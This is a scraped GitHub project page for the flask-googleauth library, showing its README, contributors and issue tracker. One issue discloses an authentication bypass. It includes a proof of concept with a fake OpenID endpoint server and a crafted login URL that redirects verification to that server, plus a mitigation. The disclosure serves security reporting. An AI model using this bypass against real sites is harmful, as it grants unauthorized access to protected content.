sashka / flask-googleauth Goto Github PK

View Code? Open in Web Editor NEW

62.0 6.0 15.0 19 KB

Super simple Google OpenID and Federated Auth for Flask apps.

License: BSD 2-Clause "Simplified" License

Python 100.00%

flask-googleauth's Introduction

Flask-GoogleAuth

This is a partial port of torando.auth to be used with Flask.

It is small, self contained and do not use any filesystem operations. Great for internal apps.

Written by Alexander Saltanov, inspired by Kenneth Reitz.

You can buy me a cup of coffee or a glass of wine. Bitcoin could be sent to 1Boahzk5jMTebqiKVESzbnVWTvBTGnAvYf

Warning

I no longer use Flask and almost don't use Python, so I don't really know whether this code still relevant or not.

This repository to be removed completely on December 2017.

flask-googleauth's People

Contributors

Stargazers

Watchers

Forkers

poiati andreyp smeggingsmegger martey runscope strogo lyft tschieggm sl4mmer martinmelin dritec ymt2 seniorpreacher

flask-googleauth's Issues

Error get g.user.name and g.user.email, why?

With debug mode, after loged in successfully, in my browser shown like this:

AttributeError
AttributeError: 'dict' object has no attribute 'name'

Traceback (most recent call last)
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1836, in call
return self.wsgi_app(environ, start_response)
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1820, in wsgi_app
response = self.make_response(self.handle_exception(e))
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1403, in handle_exception
reraise(exc_type, exc_value, tb)
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1817, in wsgi_app
response = self.full_dispatch_request()
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1477, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1381, in handle_user_exception
reraise(exc_type, exc_value, tb)
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1475, in full_dispatch_request
rv = self.dispatch_request()
File "/usr/local/lib/python2.7/dist-packages/Flask-0.10.1-py2.7.egg/flask/app.py", line 1461, in dispatch_request
return self.view_functionsrule.endpoint
File "/usr/local/lib/python2.7/dist-packages/Flask_GoogleAuth-0.4-py2.7.egg/flask_googleauth.py", line 271, in decorated
return fn(_args, *_kwargs)
File "/home/suyadi/projects/Flask-Resrfull/google.py", line 16, in secret
return "You have rights to be here, %s (%s)" % (g.user.name, g.user.email)
AttributeError: 'dict' object has no attribute 'name'

ok

good，bug i hope support many api

Latest version unreleased

The master branch is not released on PyPi. Is it intentional or an overlook?

I would really like to get the force_auth_on_every_request functionality.

Does this package support Python 3?

On 19 February 2017, Python 3 will be 3,000 days old! We are interested to see if we can get at least 50% of the Top 5,000 PyPI packages to compatible with Python 3 by that date. We are really close and given that this package is in the PyPI Top 5,000, we seek your assistance in pushing us over that threshold.

So, if this package already supports Python 3 then please consider adding an appropriate trove classifier "Programming Language :: Python :: 3" to this package's PyPI page so that tools can automaticly determine its Python 3 compatibility.

Google has stopped support for OpenId2 since may 2014

According to this :
https://developers.google.com/+/api/auth-migration#timetable

New domains using flask-googleauth are giving this error 👍
OpenID auth request contains an unregistered domain

Can you please add support for google+ Open ID?

Specially crafted URL allows for bypassing OpenID authentication.

Summary

flask-googleauth uses openid.op_endpoint directly from the query arguments. This allows a malicious user to bypass the openid auth phase.

Steps to reproduce

Using flask-googleauth we can create a simple service such as:

from flask import Flask
from flask_googleauth import GoogleFederated

app = Flask(__name__)
auth = GoogleFederated("example.com", app)

@app.route('/')
@auth.required
def index():
    return 'Privileged content'

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug = True)

We will serve this from localhost:5000

We can set up a server somewhere running

from flask import Flask
app = Flask(__name__)

@app.route('/', methods=['POST'])
def authcheck():
    return 'is_valid:true'

app.run(host='0.0.0.0', port = 5001)

We will serve this from localhost:5001

Now we can access http://localhost:5000/login/?openid.mode=id_res&openid.op_endpoint=http%3A%2F%2Flocalhost%3A5001%2F&openid.claimed_id=exam and be presented with 'Privileged content'.

Analysis

This works because:

openid.mode is set (value not important) (

flask-googleauth/flask_googleauth.py

Line 237 in 9130dac

if request.args.get("openid.mode", None):

)
openid.op_endpoint is accepted directly from the query arguments allowing us to hijack the request. (

flask-googleauth/flask_googleauth.py

Line 93 in 9130dac

url = request.args.get("openid.op_endpoint", self._OPENID_ENDPOINT)

)
We supply some value for some part of the user structure (so it is non-empty) (

flask-googleauth/flask_googleauth.py

Line 248 in 9130dac

if not user:

)

Mitigation

Dont use openid.op_endpoint.

Support for reverse proxies

If running a Flask app behind Nginx, the redirect url is incorrect since it is using the localhost URL instead of the URL Nginx is responding to. Perhaps just adding a setting to specify the domain for the redirect.